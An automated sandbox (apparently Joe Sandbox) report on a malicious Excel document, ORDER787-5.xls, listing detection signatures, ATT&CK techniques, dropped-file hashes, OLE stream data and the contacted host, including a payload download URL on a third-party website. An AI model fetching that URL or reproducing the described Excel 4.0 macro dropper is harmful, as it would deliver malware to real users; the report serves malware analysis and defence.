Analysis Report ORDER787-5.xls
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for dropped file | Show sources |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: | Jump to behavior |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Found malicious URLs in unpacked macro 4.0 sheet | Show sources |
Source: | Macro 4.0 Deobfuscator: |
Source: | JA3 fingerprint: |
Source: | File created: | Jump to behavior |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Code function: | 4_2_1000B826 | |
Source: | Code function: | 4_2_10009C77 | |
Source: | Code function: | 4_2_1000BD68 | |
Source: | Code function: | 4_2_1000C96E | |
Source: | Code function: | 4_2_10005DD0 | |
Source: | Code function: | 4_2_1000D667 | |
Source: | Code function: | 4_2_1000C2AA | |
Source: | Code function: | 4_2_1000E6DC | |
Source: | Code function: | 4_2_100057AA |
Source: | OLE indicator, VBA macros: |
Source: | Code function: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Source: | Code function: | 4_2_100018B0 |
Source: | Code function: | 4_2_10005DC4 | |
Source: | Code function: | 4_2_1000A671 | |
Source: | Code function: | 4_2_0035214D | |
Source: | Code function: | 4_2_0035214D |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Stream path 'Workbook' entropy: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: | 4_2_100018B0 |
Source: | Code function: | 4_2_10004844 |
Source: | Code function: | 4_2_100018B0 |
Source: | Code function: | 4_2_001A0456 | |
Source: | Code function: | 4_2_001A095E | |
Source: | Code function: | 4_2_001E1030 |
Source: | Code function: | 4_2_10002AB0 |
Source: | Code function: | 4_2_10004844 | |
Source: | Code function: | 4_2_10005081 | |
Source: | Code function: | 4_2_100050A3 | |
Source: | Code function: | 4_2_1000A672 | |
Source: | Code function: | 4_2_100026C4 |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 4_2_100090B2 |
Source: | Code function: | 4_2_1000E4AD |
Source: | Code function: | 4_2_10007F84 |
Source: | Code function: | 4_2_10002AB0 |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting31 | Path Interception | Process Injection11 | Masquerading11 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery12 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | System Information Discovery24 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting31 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information21 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
4% | ReversingLabs | Script.Trojan.Heuristic |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
15% | ReversingLabs | |||
15% | ReversingLabs |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
4% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
penrithdentalimplants.com.au | 160.153.76.195 | true | false |
| unknown |
www.penrithdentalimplants.com.au | unknown | unknown | false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
true |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
160.153.76.195 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 336129 |
Start date: | 05.01.2021 |
Start time: | 13:00:07 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 35s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | ORDER787-5.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/13@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
13:00:52 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-26496-GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 327680 |
Entropy (8bit): | 7.594344556420887 |
Encrypted: | false |
SSDEEP: | 6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp |
MD5: | 1A57412AB2EDD77103FD75768BA146DD |
SHA1: | 81599A9B526C16B2A0A82CADCB8ACAAC6781EC81 |
SHA-256: | 7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917 |
SHA-512: | 7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.1104823335779463 |
Encrypted: | false |
SSDEEP: | 6:kKekMSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:lWkPlE99SNxAhUegeT2 |
MD5: | 88D01B15C32DC5F54651F0A97864E0EF |
SHA1: | 1396AB210AF8B93B30E8A46FBB83DAE780B84B11 |
SHA-256: | AD6121D0521AEAE4EFA83923B306C43A8EA2B74184AE0C898F6BACB4B8046702 |
SHA-512: | 0CEA566ADBCA3DE2C4AA21799DD19B9B755A7B355953144BDB20BFF927B81E897EB3A4EEFAAA7E57D94EB9D361BC45FADA0669EFA346FEFF4F8B0E248C0C5C8C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 327680 |
Entropy (8bit): | 7.594344556420887 |
Encrypted: | false |
SSDEEP: | 6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp |
MD5: | 1A57412AB2EDD77103FD75768BA146DD |
SHA1: | 81599A9B526C16B2A0A82CADCB8ACAAC6781EC81 |
SHA-256: | 7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917 |
SHA-512: | 7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | https://www.penrithdentalimplants.com.au/ls/apperolew.png |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2128 |
Entropy (8bit): | 2.131067658554214 |
Encrypted: | false |
SSDEEP: | 24:YW7VoaaP0yGLCfVxwj4LoFjh0JtxlggL0lue:NPazfVxwji5Ax |
MD5: | A4CD320321FB7CB36DCDBE18372DB7F6 |
SHA1: | 2214C8B629049D3FCAA14F59636C884A4A2AC765 |
SHA-256: | 382EFF7970B1157CA3CC1DE889E7BBC92BA06E2E9992FFB1E515C27C5B914EC2 |
SHA-512: | 395C094254E8B9E076527D452AC039397F5ACAB0171DBA7338F4571D33771124585FDDDBB35AEDDDB0A022BC9626DBFF761850E41AEBFE0CC25CBD0CE308CA6A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2128 |
Entropy (8bit): | 2.077588804474407 |
Encrypted: | false |
SSDEEP: | 24:Ywl/V3uaP0z4GmXIfzCsf3dte3YLaFnuOlehywoy/://QaRYfGi3do3l8 |
MD5: | D2F8C79A51EC1F551B9233C6FD1083EA |
SHA1: | 73FB2CA087FB85B595A981D499ACB31C156BB71C |
SHA-256: | 5C748A589C0EEA58A5664F62DD15E3B06CC436A8E5A30918F881793A8743379B |
SHA-512: | 341687BE2080E7BA0E6D778A4C013D1742745D294D94FAED19626BF4C050048D0C0D47D838D1F7092985D3873D63CC8B78A74F6569F8D299DF82159E79581E19 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 241332 |
Entropy (8bit): | 4.206848634864182 |
Encrypted: | false |
SSDEEP: | 1536:cGILEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cdNNSk8DtKBrpb2vxrOpprf/nVq |
MD5: | 93F2225BF5FFD6C4E480793CA89F0CBB |
SHA1: | 901730BE002933D11806C6417D1B35C794AFB953 |
SHA-256: | 968744AFB8FBEE61678CD949E38D7B4AC80073A40A90CC1E865C56621F0A925D |
SHA-512: | F01FAEBCEDD8D7C3B4C8404387A3BEF66E95853ECDCCFDE641261A32CC12C22C81D810E3E2FB161099756F64462C3B9DBC35733C55C9A3D84E5C81FBDBC35EBD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 148333 |
Entropy (8bit): | 7.862613200850918 |
Encrypted: | false |
SSDEEP: | 3072:/wW92ouB+ctexrUW/HlaLuZl4KKB/BtVhdoMOmLtlbTy:/ZxuZexI0lSh/BbhdoMOmK |
MD5: | F172F8A0B25CB105FD588B810003BE34 |
SHA1: | A8317748F41F50D28FCCCC7CA11C74DC524D67D2 |
SHA-256: | E011EC839076E4F99839C495FA3B3BD70246EBF39B593724DA51B1E314263A0D |
SHA-512: | 5E004E3F06C46A17F4904344AECB42E7C030D1166D31AF0D904730ED689FDECA1F87A00B808D01B9E4C901BD9C4CBD35713EE77576E493BB7950455C88045D66 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.496574117992861 |
Encrypted: | false |
SSDEEP: | 12:85QhenCLgXg/XAlCPCHaXtB8XzB/lzUX+WnicvbsW1bDtZ3YilMMEpxRljKHTdJU:85vU/XTd6jHUYe7Dv3qWrNru/ |
MD5: | F477EDF49DB8F29FA1F7E8563873054A |
SHA1: | C39AC7E0ACF6C289AD7EE4FDC23C4D2E3778C550 |
SHA-256: | 3232C9EC5CC69786EEB55B4CA42C340AB196433A6F9D10B69104223F03C9FE55 |
SHA-512: | 8A43D696AE55466F73669264D320BAD18A4AB8A0DB0BCDC2ED7F446BC377FCB664B9EB300293E7835CD48B0118F9EECF727E10F1271B7BD3525985AA040E4474 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4056 |
Entropy (8bit): | 4.528803921190274 |
Encrypted: | false |
SSDEEP: | 96:8TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQ/:8bjFwg7QEbjFwg7QEbjFwg7QEbjFwg7g |
MD5: | BE347C89A9A76E5DF8F2035AF09871FF |
SHA1: | A5D5164AB3B388822846783B1D4543BA19C788C5 |
SHA-256: | 9F0967ED9573F54FB9A4EFFF1208E6DC8DF58792191F759F7B4BDBD5A3ADC0FF |
SHA-512: | 8FF4F2D97F45401FF6F53E48B1A2C56099DC71BD38BB386E7DAE90B77C9DA33A96D3FDF0905FC1687DDA31A88B4C5DE15E73270992E1CD4F63324A7B8870AFC6 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 169 |
Entropy (8bit): | 4.42743505414388 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCv:dj6kQZC3ZUkQZC3ZUkQZC3ZUkQZs |
MD5: | 4232FA4840865D1AC196D3F04B274801 |
SHA1: | BB30CFD9644E02C3A4766006AC5DDDD11684B15F |
SHA-256: | D10AC2C8001288BBB4AD0E1A10572DEC3E549158FDDC2042084613941D17ACD7 |
SHA-512: | 7ADAAF43B2E7CA5E4578B1E7F16F219CD331A50190036490FFEDA1B30E44F656D61C4848ABA6F5DD5EA365F63C346254872F6E54FD6D531394992A9954F69B18 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.881888506863549 |
TrID: |
|
File name: | ORDER787-5.xls |
File size: | 165376 |
MD5: | 1d97c6cb50c4107498e4f0e76f539f0c |
SHA1: | a4dc090837c76aed324bea19c9f62e2d47bb7bc8 |
SHA256: | 1b761a682092f8be6c7e9eef709be08a7105159a5e4ffb7722b0530fba308ba4 |
SHA512: | 08c580cbb19b3684f96ab82ec358ca42b796d52045c71d7f794f91d745b62f184d0b1c6842dd6577fb2a0b762bd236f1d1d593b3c592767788fda08739b025a3 |
SSDEEP: | 3072:6D/0mXgqPYJJv0Cl04gsDDNEnRL/WL018klfOPxHfoVsfMJETA24CLjmbzafPRj:6z/PE2hyDJEBW6plWPGi4ENmbza3 |
File Content Preview: | ........................>.......................................................c.............................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "ORDER787-5.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | True |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-01-04 17:53:11 |
Creating Application: | |
Security: | 1 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 983040 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 102 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 102 |
Entropy: | 4.1769286656 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1a 00 00 00 cb e8 f1 f2 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 280 |
Entropy: | 3.26288952551 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d a t a 2 . . . . . D i g i t a l S e c u r e . . . . . d a t a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a6 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 200 |
Entropy: | 3.27412475502 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . y w . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Ctls, File Type: data, Stream Size: 68 |
---|
General | |
---|---|
Stream Path: | Ctls |
File Type: | data |
Stream Size: | 68 |
Entropy: | 3.77907363839 |
Base64 Encoded: | False |
Data ASCII: | . . . B . . . . . . . . ` . . . . . . ` . . . . . . . . . . . ( . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . |
